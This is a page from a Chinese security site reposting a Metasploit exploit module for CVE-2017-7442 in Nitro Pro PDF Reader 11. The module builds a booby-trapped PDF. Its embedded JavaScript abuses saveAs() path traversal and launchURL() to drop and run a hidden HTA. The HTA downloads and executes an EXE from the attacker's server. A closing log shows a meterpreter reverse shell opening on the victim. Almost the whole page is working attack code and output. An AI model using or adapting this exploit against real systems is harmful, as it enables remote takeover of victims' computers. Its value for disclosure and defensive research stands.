首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Nitro Pro PDF Reader 11.0.3.173 Remote Code Execution
来源:metasploit.com 作者:sinn3r 发布时间:2017-08-02  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::FileDropper
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution',
      'Description'    => %q{
          This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro
          PDF Reader version 11. The saveAs() Javascript API function allows for writing
          arbitrary files to the file system. Additionally, the launchURL() function allows
          an attacker to execute local files on the file system and bypass the security dialog

          Note: This is 100% reliable.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
      [
        'mr_me <steven[at]srcincite.io>',         # vulnerability discovery and exploit
        'Brendan Coles <bcoles [at] gmail.com>',  # hidden hta tricks!
        'sinn3r'                                  # help with msf foo!
      ],
      'References'     =>
        [
          [ 'CVE', '2017-7442' ],
          [ 'URL', 'http://srcincite.io/advisories/src-2017-0005/' ],           # public advisory #1
          [ 'URL', 'https://blogs.securiteam.com/index.php/archives/3251' ],    # public advisory #2 (verified and acquired by SSD)
        ],
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => false
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # truly universal
          [ 'Automatic', { } ],
        ],
      'DisclosureDate' => 'Jul 24 2017',
      'DefaultTarget'  => 0))

      register_options([
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.pdf']),
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
      ])
      deregister_options('SSL', 'SSLVersion', 'SSLCert')
  end

  def build_vbs(url, stager_name)
    name_xmlhttp  = rand_text_alpha(2)
    name_adodb    = rand_text_alpha(2)
    vbs           = %Q|<head><hta:application
    applicationname="#{@payload_name}"
    border="none"
    borderstyle="normal"
    caption="false"
    contextmenu="false"
    icon="%SystemRoot%/Installer/{7E1360F1-8915-419A-B939-900B26F057F0}/Professional.ico"
    maximizebutton="false"
    minimizebutton="false"
    navigable="false"
    scroll="false"
    selection="false"
    showintaskbar="No"
    sysmenu="false"
    version="1.0"
    windowstate="Minimize"></head>
    <style>* { visibility: hidden; }</style>
    <script language="VBScript">
    window.resizeTo 1,1
    window.moveTo -2000,-2000
    </script>
    <script type="text/javascript">setTimeout("window.close()", 5000);</script>
    <script language="VBScript">
    On Error Resume Next
    Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP")
    #{name_xmlhttp}.open "GET","http://#{url}",False
    #{name_xmlhttp}.send
    Set #{name_adodb} = CreateObject("ADODB.Stream")
    #{name_adodb}.Open
    #{name_adodb}.Type=1
    #{name_adodb}.Write #{name_xmlhttp}.responseBody
    #{name_adodb}.SaveToFile "C:#{@temp_folder}/#{@payload_name}.exe",2
    set shellobj = CreateObject("wscript.shell")
    shellobj.Run "C:#{@temp_folder}/#{@payload_name}.exe",0
    </script>|
    vbs.gsub!(/    /,'')
    return vbs
  end

  def on_request_uri(cli, request)
    if request.uri =~ /\.exe/
      print_status("Sending second stage payload")
      return if ((p=regenerate_payload(cli)) == nil)
      data = generate_payload_exe( {:code=>p.encoded} )
      send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
      return
    end
  end

  def exploit
    # In order to save binary data to the file system the payload is written to a .vbs
    # file and execute it from there.
    @payload_name = rand_text_alpha(4)
    @temp_folder  = "/Windows/Temp"
    register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")
    if datastore['SRVHOST'] == '0.0.0.0'
      lhost = Rex::Socket.source_address('50.50.50.50')
    else
      lhost = datastore['SRVHOST']
    end
    payload_src  = lhost
    payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
    stager_name = rand_text_alpha(6) + ".vbs"
    pdf = %Q|%PDF-1.7
    4 0 obj
    <<
    /Length 0
    >>
    stream
    |
    pdf << build_vbs(payload_src, stager_name)
    pdf << %Q|
    endstream endobj
    5 0 obj
    <<
    /Type /Page
    /Parent 2 0 R
    /Contents 4 0 R
    >>
    endobj
    1 0 obj
    <<
    /Type /Catalog
    /Pages 2 0 R
    /OpenAction [ 5 0 R /Fit ]
      /Names <<
        /JavaScript <<
          /Names [ (EmbeddedJS)
            <<
              /S /JavaScript
              /JS (
                    this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
                    app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
              )
            >>
          ]
        >>
      >>
    >>
    endobj
    2 0 obj
    <</Type/Pages/Count 1/Kids [ 5 0 R ]>>
    endobj
    3 0 obj
    <<>>
    endobj
    xref
    0 6
    0000000000 65535 f
    0000000166 00000 n
    0000000244 00000 n
    0000000305 00000 n
    0000000009 00000 n
    0000000058 00000 n
    trailer <<
    /Size 6
    /Root 1 0 R
    >>
    startxref
    327
    %%EOF|
    pdf.gsub!(/    /,'')
    file_create(pdf)
    super
  end
end

=begin
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc
[*] Processing scripts/nitro.rc for ERB directives.
resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi
resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (scripts/nitro.rc)> set LHOST 172.16.175.1
LHOST => 172.16.175.1
resource (scripts/nitro.rc)> exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.175.1:4444 
msf exploit(nitro_reader_jsapi) > [+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.100.4:8080/
[*] Server started.
[*] 192.168.100.4    nitro_reader_jsapi - Sending second stage payload
[*] Sending stage (957487 bytes) to 172.16.175.232
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500
[+] Deleted C:/Windows/Temp/UOIr.hta

msf exploit(nitro_reader_jsapi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2412 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\researcher\Desktop>
=end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Solarwinds Kiwi Syslog 9.6.1.6
·Microsoft Windows LNK Shortcut
·Advantech SUSIAccess <= 3.0 -
·Advantech SUSIAccess <= 3.0 -
·DiskBoss Enterprise 8.2.14 - B
·Jenkins < 1.650 - Java Deseria
·Bittorrent 7.10.0 (Build 43581
·GitHub Enterprise < 2.8.7 - Re
·AudioCoder 0.8.46 - Local Buff
·MediaCoder 0.8.48.5888 - Local
·Microsoft Windows - LNK Shortc
·VICIdial 2.9 RC 1 to 2.13 RC1
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved